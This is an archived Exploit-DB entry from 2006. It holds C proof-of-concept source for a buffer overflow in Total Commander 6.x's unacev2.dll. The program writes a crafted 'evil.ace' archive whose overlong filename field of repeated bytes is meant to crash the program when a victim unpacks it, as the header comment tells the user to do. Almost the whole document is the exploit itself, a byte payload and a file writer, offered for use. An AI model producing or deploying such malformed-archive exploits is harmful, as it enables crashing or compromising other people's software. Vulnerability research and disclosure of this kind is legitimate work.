Total Commander 6.x - 'unacev2.dll' Buffer Overflow (PoC)

EDB-ID:

1633

Author:

darkeagle

Type:

dos

Platform:

Windows

Published:

2006-04-02

/*
--
/\
\/	Total Commander unacev2.dll Buffer Overflow PoC Exploit
/\			by Darkeagle of Unl0ck Research Team
\/					http://unl0ck.net
/\	
\/	when file will be created, try to open archive in TotalCmd and then unpack it ;)
/\
\/
--
*/
#include <string.h>
#include <stdio.h>

unsigned char evil_ace[] = 
	"\x29\x8F\x31\x00\x00\x00\x90\x2A\x2A\x41\x43\x45\x2A\x2A\x14\x14" 
	"\x02\x00\x79\xB5\x7F\x34\xFE\xE2\x05\xA5\x00\x00\x00\x00\x16\x2A" 
	"\x55\x4E\x52\x45\x47\x49\x53\x54\x45\x52\x45\x44\x20\x56\x45\x52" 
	"\x53\x49\x4F\x4E\x2A\x7F\x30\x1E\x01\x01\x01\x00\x00\x00\x00\x00" 
	"\x00\x00\x00\x00\x75\xB5\x7F\x34\x20\x00\x00\x00\xFF\xFF\xFF\xFF" 
	"\x00\x03\x0A\x00\x54\x45\xFF\x00\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x2E\x74\x78\x74";


int main()
{
	FILE *ace;
	ace = fopen("evil.ace", "w+b");
	fwrite(evil_ace, 1, sizeof(evil_ace)-1, ace);
	fclose(ace);
	return 0;

}

// milw0rm.com [2006-04-02]